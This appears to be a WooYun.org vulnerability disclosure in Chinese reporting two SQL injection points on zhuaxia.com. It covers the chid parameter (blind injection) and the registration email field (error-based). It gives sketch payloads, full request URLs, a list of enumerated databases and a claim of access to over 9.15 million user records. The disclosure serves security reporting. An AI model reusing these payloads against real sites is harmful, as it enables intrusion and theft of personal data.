WooYun.org

第一枚：URL：http://www.zhuaxia.com/php_controller/myFeedController.php?action=channelInfo&chid=833&customerId=29034823&lastid=0&show_all_item=1&sourceid=0&stamp=0.09998915647156537&version=200812241245
存在问题参数：chid
payload：:1.布尔盲注 AND 1=1 、AND 1=2
2.时间盲注 AND sleep（XX）
这里是字符型注入
第二枚：
URL：http://www.zhuaxia.com/register_check.php?logId=165
POST参数：blog_url=1&code=94102&do_reg=1&email=test%40email.com&ivc=ARkGQlYUBxw%3d&nickname=1&password=g00dPa%24%24w0rD&password_second=g00dPa%24%24w0rD
存在问题参数是email
报错注入
payload：' and select XXX from (select concat(xx) from ionfromation.XX ) and 'a'='a
这里首先应该关闭显错。
available databases [10]:
[*] dba
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] test
[*] tudui
[*] wordpress
[*] wordpress_mu
[*] XiaoNei
这里的tudui是一个重要的数据库含有大量的表
然后跑其中前五个的数据如下图：

这是一个用户信息的表，仅截取字段的图举例，后面是数据未截图出来。
然后看了一下XiaoNei这个库

可以看到用户信息有915万多
具体到数据举例前五